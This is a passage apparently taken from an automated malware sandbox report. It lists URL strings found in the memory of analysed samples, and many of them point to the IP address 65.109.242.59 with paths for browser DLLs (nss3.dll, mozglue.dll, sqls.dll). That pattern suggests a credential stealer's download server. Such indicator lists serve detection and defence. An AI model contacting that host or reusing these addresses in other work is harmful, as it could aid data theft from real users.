                Source: katB4C0.tmp, 0000000B.00000002.2810229470.000000001DE0D000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.11.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: 38F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: 38F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: 76561199689717899[1].htm.11.drString found in binary or memory: https://65.109.242.59
                Source: katB4C0.tmp, 0000000B.00000003.2336765418.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2485038714.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2459479355.00000000009F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/
                Source: katB4C0.tmp, 0000000B.00000003.2367775910.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/&
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2367775910.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/(
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.0000000000996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/-
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.00000000009B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/09.242.59/
                Source: katB4C0.tmp, 0000000B.00000003.2459479355.00000000009F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/2
                Source: katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/4
                Source: katB4C0.tmp, 0000000B.00000003.2399303935.0000000000993000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2471122571.00000000009F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/A
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.00000000009B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/B
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.00000000009F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/C
                Source: katB4C0.tmp, 0000000B.00000003.2399303935.0000000000993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/E
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.00000000009F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/F
                Source: katB4C0.tmp, 0000000B.00000003.2367775910.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/L
                Source: katB4C0.tmp, 0000000B.00000003.2367775910.0000000000993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/M
                Source: katB4C0.tmp, 0000000B.00000003.2399303935.00000000009B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/RA
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.00000000009F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/T
                Source: katB4C0.tmp, 0000000B.00000003.2459479355.00000000009F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/V
                Source: katB4C0.tmp, 0000000B.00000003.2367775910.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/Z
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.00000000009F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/c
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dll
                Source: katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/g
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.00000000009B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/h
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/mozglue.dll
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/mozglue.dllA
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.0000000000953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/msvcp140.dll
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.00000000009F7000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/nss3.dll
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.00000000009F7000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/nss3.dllD
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.00000000009F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/q
                Source: katB4C0.tmp, 0000000B.00000003.2512766694.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/s
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/softokn3.dll
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.000000000095D000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.0000000000953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/sqls.dll
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.000000000095D000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.0000000000953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/sqls.dllz
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.00000000009B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/ss3.dll
                Source: katB4C0.tmp, 0000000B.00000003.2367775910.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/u
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.000000000097D000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.000000000097D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/vcruntime140.dll
                Source: katB4C0.tmp, 0000000B.00000003.2367775910.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/~
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59AKEH
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59GDHJ
                Source: 38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: explorer.exe, 00000001.00000000.1725399899.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                Source: explorer.exe, 00000001.00000000.1721748248.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                Source: explorer.exe, 00000001.00000000.1721748248.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                Source: explorer.exe, 00000001.00000000.1725399899.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000001.00000000.1723237920.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000001.00000000.1723237920.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                Source: explorer.exe, 00000001.00000000.1720906184.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720143195.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000001.00000000.1723237920.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1723237920.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: explorer.exe, 00000001.00000000.1723237920.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                Source: 76561199689717899[1].htm.11.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, DHIEHI.11.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, DHIEHI.11.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
                Source: 38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 00000001.00000000.1721748248.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                Source: explorer.exe, 00000001.00000000.1721748248.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                Source: 38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2367775910.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
                Source: 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
